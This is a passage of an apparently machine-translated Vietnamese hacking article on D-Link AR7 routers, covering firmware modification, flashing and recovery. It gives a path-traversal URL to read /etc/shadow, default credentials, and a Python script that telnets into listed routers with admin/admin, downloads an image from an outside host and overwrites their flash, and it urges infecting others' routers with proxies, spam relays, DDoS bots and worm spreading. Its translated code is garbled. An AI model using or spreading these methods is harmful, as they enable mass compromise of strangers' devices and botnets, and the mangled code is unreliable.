Chẳng ích gì khi tranh cãi về việc không tuân thủ giấy phép).

cm_logic– một chương trình điều khiển logic của hệ thống, thông qua nó
đang tiến hành cấu hình; đồng bộ hóa /etc/config.xml với
phần tương ứng của nội dung của /dev/ticfg (trỏ tới mtd3).

cm_cli– Giao diện dòng lệnh để quản lý và cấu hình
hệ thống. Ví dụ: cài đặt kết nối được thực hiện thông qua giao diện này.

cm_pc– khởi chạy và giám sát các quy trình, kết nối với các quy tắc
(ví dụ: chạy chương trình dưới dạng daemon; các quy tắc cũng bao gồm thông tin về
cổng mở) được mô tả trong /etc/progdefs.xml; tải ngay sau đó
hạt nhân.

webcm– Giao diện CGI, bị rò rỉ, ví dụ cho phép bạn xem /etc/shadow,
chỉ đơn giản bằng cách truy cập vào URL.

http://192.168.1.1/../../../etc/shadow

Tôi không nhận được gì cả, thttpd không đơn giản như vậy, nhưng nếu vậy:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Cái khác. Điều này có thể được sử dụng để thu thập thông tin nếu không có quyền truy cập vào
ssh/telnet, nhưng có quyền truy cập vào giao diện Web.

firmwarecfg– được sử dụng để flash firmware thông qua giao diện Web. Ở lối vào
của chương trình này, một hình ảnh được truyền với yêu cầu POST từ giao diện Web và nó đã
chuyển hướng đến bộ nhớ Flash sau lần kiểm tra tổng kiểm tra hình ảnh đầu tiên.

Tại thời điểm này, việc thu thập thông tin chính đã hoàn tất, đã đến lúc chuyển sang bước quyết định
hành động.

Cài đặt công cụ phát triển và biên dịch chương trình cơ sở

Phần sụn cho bộ định tuyến D-Link (và tất cả các bộ định tuyến khác dựa trên GNU/Linux)
được phân phối theo giấy phép GPL, bạn có thể lấy chúng trên trang web chính thức
Máy chủ ftp. Trên thực tế, bạn có thể chọn bất kỳ phần mềm nào trong danh sách phần mềm được đề xuất,
chúng giống nhau (liên quan đến dòng T). Việc phân phối bao gồm mã nguồn của kernel, môi trường,
các công cụ và chuỗi công cụ cần thiết để phát triển/biên dịch các công cụ hiện có
các chương trình. Nó nên được giải nén vào thư mục gốc và thêm vào biến môi trường
Đường dẫn PATH đến thư mục bin của toolchain:

$ tar xvf tools.tgz
$ xuất PATH=$PATH:/opt/

Bây giờ, để biên dịch chương trình cơ sở của riêng bạn, hãy vào thư mục
với mã nguồn và chạy cùng loại mã này.

$ cd DSL/TYLinuxV3/src && make

Sẽ có rất nhiều câu hỏi được đặt ra về việc bật hỗ trợ thiết bị (tốt hơn
trả lời chúng một cách tích cực). Sau khi biên dịch xong, vào thư mục TYLinuxV3/images
Hình ảnh phần sụn sẽ được tạo. Bạn cũng có thể chạy tập lệnh có cùng tên với tập lệnh của bạn
mô hình từ thư mục /TYLinuxV3/src/scripts.

Một vài lời về việc truyền tập tin giữa bộ định tuyến và máy tính. Việc đầu tiên
phương pháp tôi đã sử dụng là khả năng truyền tệp qua giao thức SSH,
sử dụng chương trình scp cho việc này. Nhưng một thời gian sau tôi phát hiện ra rằng mc (Midnight
Commander) còn có khả năng kết nối thông qua SSH (Panel -> Shell Connection).
Ngoài ra, bạn có thể thiết lập máy chủ Web hoặc FTP tại nơi làm việc của mình. Sau này tôi
Tôi ưu tiên máy chủ Web vì nó hoạt động nhanh nhất. Tôi đã cài đặt nó
thttpd, nhỏ và nhanh, giống như trên bộ định tuyến. Chúng tôi khởi chạy nó ở nhà và tải nó xuống
router, sau khi vào thư mục /var (nó, như đã đề cập
trước đó, có sẵn để ghi lại).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# quên http://192.168.1.2/file

Để tải xuống tệp từ bộ định tuyến, bạn cũng có thể nâng cao máy chủ Web:

# thttpd -g -d /var -u root -p 8080

Xin lưu ý rằng nếu bạn muốn tải xuống một tập tin thực thi từ bộ định tuyến, bạn nên
loại bỏ quyền khởi chạy. Khi tải xuống một số lượng lớn tệp từ bộ định tuyến
Tốt hơn nên sử dụng mc, trước tiên bạn sẽ không cần sao chép tệp vào/var và
xóa quyền, sau đó xóa các tệp này để giải phóng dung lượng. Nhìn chung, vấn đề
nếm thử, chọn bất kỳ tùy chọn nào thuận tiện cho bạn.

Tạo chương trình của riêng bạn

Tất nhiên, hãy bắt đầu với một chương trình cổ điển - HelloWorld. Một số cái đặc biệt
không có quy định. Nội dung của chương trình quen thuộc một cách đau đớn:

#bao gồm
#bao gồm

int chính(void)
{
printf("Mate.Feed.Kill.Repeat.");
trả về 0;
}

Chúng tôi biên dịch (đường dẫn đến chuỗi công cụ phải được chỉ định trong biến môi trường
CON ĐƯỜNG):

$ mips_fp_le-gcc hell.c -o địa ngục
$ mips_fp_le-strip - chết tiệt

# cd /var
# chmod +x chết tiệt
# ./địa ngục

Và... sẽ không có gì xảy ra, hoặc thông báo không tìm thấy đường dẫn sẽ xuất hiện. Nó là gì
trường hợp? Tôi đã nói về cm_pc - chương trình này ra mắt những chương trình khác trong
theo các quy tắc được mô tả trong /etc/progdefs.xml. Bây giờ đã đến lúc
sửa đổi và flash hình ảnh hệ thống tập tin.

Sửa đổi hệ thống tập tin

Để sửa đổi hệ thống tập tin, trước tiên bạn cần phải
giải nén. Như tôi đã đề cập, hệ thống tệp ở đây là SquashFs với bản vá LZMA.
Gói phát triển chương trình cơ sở chỉ bao gồm chương trình mksquashfs (để tạo
image), unsquashfs (để giải nén) bị thiếu. Nhưng không sao cả, mọi thứ đều có sẵn
trên trang web hệ thống tập tin, chúng tôi cần phiên bản đầu tiên. Bằng cách áp dụng bản vá LZMA và
Sau khi thu thập các tiện ích, chúng tôi đặt chúng ở một nơi thuận tiện. Đầu tiên chúng ta có được hình ảnh
hệ thống tập tin từ bộ định tuyến:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir đã giải nén_fs
$ unsquashfs fs.img đã giải nén_fs

Bây giờ bạn có thể sửa đổi nó theo ý muốn và chúng tôi có thể gửi nó đến FuckTheWorld
/bin và thêm quy tắc để chạy trong /etc/progdefs.xml.

$ cp xin chào unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

Và chúng tôi thêm phần này (giữa các thẻ ):

địa ngục
/bin/địa ngục

Lưu và đóng gói lại:

$ mksquashfs unpacked_fs my_fs.img -noappend

Xin lưu ý rằng hình ảnh hệ thống tập tin không được vượt quá
kích thước chấp nhận được. Nếu bạn cảm thấy muốn thử điều gì đó khẩn cấp nhưng lại không
phù hợp, hãy xóa bất cứ thứ gì “không cần thiết” khỏi hình ảnh như grep, whoami hoặc
sử dụng trình đóng gói tệp thực thi UPX. Bây giờ hãy tải nó xuống bộ định tuyến
hình ảnh và chuyển sang phần tiếp theo.

Ghi lại hình ảnh hệ thống tập tin

Phương pháp flash bộ định tuyến rất đơn giản; nó liên quan đến việc truy cập vào thiết bị
/dev/mtdblock/*. Vì vậy, hãy tải tập tin hình ảnh lên bộ định tuyến theo bất kỳ cách nào thuận tiện.
hệ thống và thực hiện hành động đơn giản này:

# cat my_fs.img > /dev/mtdblock/0 && khởi động lại

# cp my_fs.img /dev/mtdblock/0 && khởi động lại

Sau một thời gian, khi quá trình ghi hoàn tất, bộ định tuyến sẽ khởi động lại và
những thay đổi sẽ có hiệu lực. Hãy thử chạy ví dụ của chúng tôi:

# địa ngục
Mate.Feed.Kill.Repeat.

Phương pháp phục hồi khi có sự cố

Trước khi flash bộ định tuyến của bạn với những “thủ công” nghiêm túc hơn, bạn nên tìm hiểu cách
hành động trong những trường hợp quan trọng khi bộ định tuyến từ chối
trọng tải. Không có tình huống vô vọng. Máy chủ FTP ADAM2 ra tay giải cứu. Vì
Trước tiên, bạn nên khởi chạy ứng dụng khách FTP tới địa chỉ IP ADAM2, địa chỉ này bạn có thể theo dõi
trong /proc/ticfg/env (tham số my_ipaddress).

$ ftp 192.168.1.199
Máy chủ FTP 220 ADAM2 đã sẵn sàng.
530 Vui lòng đăng nhập bằng USER và PASS.

Để rõ ràng, bạn có thể bật chế độ gỡ lỗi, sau đó tất cả
thông tin và tất cả các phản hồi FTP:

Đăng nhập/mật khẩu – adam2/adam2. Quá trình nhấp nháy rất đơn giản. Để bắt đầu
chuyển phiên FTP sang chế độ nhị phân:

ftp> trích dẫn MEDIA FLSH

Ví dụ: bây giờ chúng tôi gửi hình ảnh của hệ thống tệp và cho biết vị trí
điểm đến:

ftp> đặt fs.img "fs.img mtd0"

Chúng tôi đợi kết thúc quá trình ghi, khởi động lại bộ định tuyến, thoát phiên:

ftp> trích dẫn KHỞI ĐỘNG LẠI
ftp> thoát

Tất cả! Như bạn có thể thấy, không có gì phức tạp cả, bây giờ nếu có sự cố xảy ra, bạn
bạn luôn có thể khắc phục tình hình.

Để dễ sử dụng, bạn nên cung cấp địa chỉ IP bình thường, kích hoạt
tự động tải (để không nhảy với thiết lập lại) và tăng nhẹ thời gian
chờ kết nối trước khi tải kernel. Tất cả các thông số này được lưu trữ trong
các biến môi trường, có các lệnh FTP ADAM2 đặc biệt: GETENV và SETENV (dành cho
nhận và thiết lập biến tương ứng). Trong phiên FTP, nhập thông tin sau
lệnh:

ftp> Tự động tải SETENV,1
ftp> SETENV autoload_timeout,8
ftp>SETENV my_ipaddress,192.168.1.1
ftp> trích dẫn KHỞI ĐỘNG LẠI
ftp> thoát

Bộ định tuyến khởi động lại và bạn có thể truy cập ADAM2 theo địa chỉ 192.168.1.1:21. Nếu như
sẽ có mong muốn khởi động lại hình ảnh kernel và kernel sẽ từ chối khởi động, FTP
sẽ tự bắt đầu. Trước khi nhấp nháy các hình ảnh đã sửa đổi, hãy đảm bảo
lưu những cái hiện tại để phục hồi. Nói chung, bạn có thể thay đổi các biến môi trường
và thông qua /proc/ticfg/env, tôi chỉ muốn cho bạn biết thêm về cách làm việc với FTP.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

Bạn có thể kiểm tra những thay đổi như thế này:

# cat /proc/ticfg/env | grep my_ipaddress

Phải làm gì nếu bạn muốn thử khởi động lại bộ nạp khởi động và làm thế nào
phải làm gì trong trường hợp thất bại? Hoặc bộ định tuyến vì lý do nào đó không khởi động được và
không có quyền truy cập vào ADAM2? Có một giải pháp - JTAG, hay nói đúng hơn là con chip này chứa EJTAG
(phiên bản mở rộng). Đây là giao diện để gỡ lỗi/lập trình trong mạch.

Để kết nối với giao diện này chúng ta cần có cổng LPT của máy tính,
đầu nối và 4 điện trở. Đề án này rất đơn giản.

Tôi vội lưu ý rằng việc cài đặt phần mềm thông qua JTAG không phải là một công việc nhanh chóng, nó sẽ mất khá nhiều thời gian.
nhiều thời gian. Vì vậy nó chỉ nên dùng để khôi phục bootloader,
ngay cả khi nó không hoạt động. Để giao tiếp qua JTAG, bạn nên sử dụng một công cụ đặc biệt
chương trình, ví dụ UrJTAG. Dưới đây là một ví dụ về cách hoạt động của giao diện này.
Kết nối cập nhật:

jtag> cáp song song 0x378 DLC5
jtag> phát hiện

Phát hiện bộ nhớ flash:

jtag> detectflash 0x30000000 1

Đọc bộ nhớ Flash:

jtag> readmem 0x30000000 0x400000 fullflash.img

Ghi vào bộ nhớ (bộ nạp khởi động):

jtag> flashmem 0x30000000 adam2.img

Việc biết về giao diện UART cũng rất hữu ích (trước đây tôi đã hứa sẽ nói về nó). TRONG
UART_A báo cáo, nghĩa là ghi nhật ký bộ nạp khởi động (ở giai đoạn đầu khởi động từ
bạn có thể giao tiếp với anh ấy) và cốt lõi. Khi viết hạt nhân đã sửa đổi, điều này
không thể thiếu cho việc gỡ lỗi. UART - Bộ thu/phát không đồng bộ đa năng
(bộ thu phát không đồng bộ phổ quát) hầu như luôn có mặt trên
vi điều khiển.

Mạch chuyển đổi rất đơn giản. Chỉ dựa trên một con chip -
Bộ chuyển đổi mức TTL: MAX232 cho COM và FT232R cho USB. Vi mạch
Chúng khá phổ biến và sẽ không có vấn đề gì khi mua hàng.

Mạch được lắp ráp trên một bảng mạch (có thể dễ dàng đặt trong hộp
nối cổng COM) trong 20 phút và mang lại rất nhiều lợi ích. Ví dụ: khi gỡ lỗi
hạt nhân là một giải pháp hoàn toàn không thể thay thế. Nếu thiết bị điện tử có vấn đề thì sao? Lối ra
là dây USB của điện thoại cũ, chỉ có đầu chuyển thôi
UART-USB.

Một số ý tưởng phân phối

Có proxy/sox của riêng bạn trên bộ định tuyến của người khác là điều tuyệt vời. Giống như spam
bộ định tuyến cho tất cả các giao thức. Đây không phải là máy tính Windows,
được sắp xếp lại hàng tháng :). Bộ định tuyến thường không được thay đổi hoặc khởi động lại. đúng và
Còn ai khác ngoài chúng tôi lại nghĩ ra ý tưởng lây nhiễm vào bộ định tuyến?

Đừng quên, chúng tôi có quyền kiểm soát tất cả lưu lượng truy cập từ người dùng/mạng. Để biết thêm
Trong các bộ định tuyến mạnh mẽ, bạn có thể treo bot DDOS. Ẩn tập tin/ẩn quá trình,
chặn việc ghi vào khối mtd mà không ghi đè chương trình của chúng tôi - tất cả chỉ có vậy
bất cứ điều gì!

Giả sử bạn sắp bắt đầu viết một chương trình nghiêm túc cho bộ định tuyến.
Việc gỡ lỗi rất tốt rất quan trọng, có thể bạn sẽ phải thực hiện việc đó rất nhiều lần
viết lại/khôi phục lại hình ảnh... Đây là một viễn cảnh rất đáng buồn. Bàn tay chẵn
giảm một chút, nếu bạn cũng tính đến tài nguyên ghi lại của bộ nhớ Flash
nhỏ (xem thêm chi tiết trong tài liệu về chip bộ nhớ) và có khả năng
hủy hoại cô ấy. Nhưng có một lối thoát! Qemu có thể mô phỏng AR7! Bạn có thể tưởng tượng được điều gì
nó có mang lại cơ hội và sự thuận tiện không giới hạn không? Bây giờ không có gì ngăn cản chúng tôi
viết một cái gì đó cực kỳ mát mẻ!

Vì thế. Bạn đã viết một chương trình, thử nghiệm nó trên bộ định tuyến của chính bạn hoặc của 1-2 người khác, nhưng
toàn bộ mạng vẫn đang ở phía trước, việc lây nhiễm thủ công là một việc vặt, trên bộ định tuyến thứ 10 bạn đã bắt đầu rồi
nguyền rủa cả thế giới, và những chuỗi “cat” và “mtd” hiện lên trong mắt bạn. Cùng viết nào
một chương trình để tự động hóa những hành động thường ngày này. Tôi đã chọn ngôn ngữ python.

Kế hoạch làm việc như sau:

• tạo danh sách các bộ định tuyến, ví dụ: sử dụng nmap;
• tập lệnh sẽ lấy địa chỉ IP từ danh sách theo thứ tự, nhập qua
  telnet với thông tin đăng nhập/mật khẩu tiêu chuẩn;
• sau đó thực hiện các bước tương tự: tải lên hình ảnh đã sửa đổi,
  viết lại, khởi động lại.

#!/usr/bin/env trăn
#Encode=UTF-8

nhập telnetlib, thời gian

MÁY CHỦ="http://anyhost.com/fs.image"

cho addr trong open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("đăng nhập:")
thời gian.ngủ(5)
telnet.write("admin\n")
telnet.read_until("Mật khẩu:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + MÁY CHỦ)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("khởi động lại")
telnet.close()

Logic của kịch bản còn rất xa mới lý tưởng, bây giờ tôi sẽ giải thích lý do. Vì
Trước tiên, bạn nên kiểm tra phiên bản firmware/kernel và model bộ định tuyến, vì có thể có
sự khác biệt nghiêm trọng trong công việc. Tiếp theo, thay vì để trống phần sụn, bạn nên tải xuống
hình ảnh hệ thống tập tin từ bộ định tuyến, giải nén, sửa đổi và gửi
mặt sau. Điều này sẽ loại bỏ các vấn đề phát sinh với khả năng tương thích trong các
model/phiên bản firmware, vì tính ổn định khi vận hành là điều quan trọng nhất đối với bạn.
Ngoài ra, vi-rút có thể có chức năng của sâu và nếu muốn, bạn luôn có thể
đính kèm một máy quét mạng, sức mạnh vũ phu cho RDP và các tính năng tương tự với nó.

Có một cách tuyệt vời khác để truyền bá nó. Không có gì ngăn cản bạn viết
chương trình dành cho Windows mà bạn sẽ mang theo bên mình (hoặc tải xuống từ
server) và lây nhiễm nó vào bộ định tuyến, nếu có.
Phân phối chương trình này theo mọi cách "tiêu chuẩn": ổ đĩa di động,
khai thác chương trình, lây nhiễm chương trình khác... Bằng cách kết hợp các phương pháp này,
Bạn có thể tạo ra một đại dịch nghiêm trọng. Chỉ cần tưởng tượng bức ảnh này - sau tất cả
Những thiết bị như vậy có mặt khắp nơi.

Bảo vệ bộ định tuyến

Sau khi tìm hiểu tất cả những điều này, tôi nghĩ: làm cách nào tôi có thể bảo vệ bộ định tuyến? Và sau đó, bạn thấy đấy, và
Tôi sẽ tự mình tới đó. Bước đầu tiên là thay đổi mật khẩu người dùng thành mật khẩu phức tạp hơn và
dài (giới hạn 8 ký tự), thay đổi banner và lời chào dịch vụ
(trình soạn thảo hex, hoặc tốt nhất là biên dịch lại các chương trình) theo thứ tự
nmap hoặc các máy quét khác không thể xác định phiên bản dịch vụ.

Bạn cũng nên thay đổi các cổng mà lũ quỷ treo trên đó. Việc này được thực hiện bởi
sửa đổi progdefs.xml. Kill telnet (cách dễ nhất để đoán mật khẩu, vâng
và giao thức không được bảo vệ, tại sao chúng ta cần nó), bật tường lửa, cho phép kết nối
chỉ truy cập dịch vụ từ địa chỉ IP hoặc MAC của riêng bạn. Cũng sử dụng tường lửa
để bảo vệ mạng hoặc máy tính, nó không phải là vô ích. Thiết lập thông minh
các quy tắc sẽ luôn giúp bạn tự bảo vệ mình.

Phần kết luận

Nhiều, không chỉ bộ định tuyến D-Link và các thiết bị tương tự khác được xây dựng trên
Chip AR7, danh sách gồm có Acorp, NetGear, Linksys, Actionec... Khá
AR7 này phổ biến cùng với MontaVista. Sau đó, bằng cách sử dụng tương tự
toolchain, bạn có thể thực hiện các bước được mô tả trong bài viết mà không gặp vấn đề gì.

Hãy thử nghĩ xem: ngoài những hành động có hại, bạn còn có thể làm điều gì đó có ích/dễ chịu cho bản thân.
và những thứ khác (tôi không tranh luận, niềm vui của việc hack không thể thay thế được, nhưng vẫn vậy).
Bạn có thể tạo chương trình cơ sở của riêng mình, chẳng hạn như các bộ định tuyến mạnh hơn có thể
tải xuống/phân phối torrent... Tất cả các model đều có giao diện USB 1.1, nhưng ở những model trẻ hơn
mô hình nó không được hàn. Thêm mô-đun USB và trình điều khiển hệ thống tệp vào kernel,
trang bị cho bộ định tuyến bộ nhớ Flash - và cuối cùng bạn sẽ có được một loại bộ lưu trữ mạng cho
số tiền nhỏ. Có rất nhiều lựa chọn, nhưng hàng nghìn ý tưởng sẽ nảy sinh - không phải
giới hạn bản thân, sáng tạo và sáng tạo!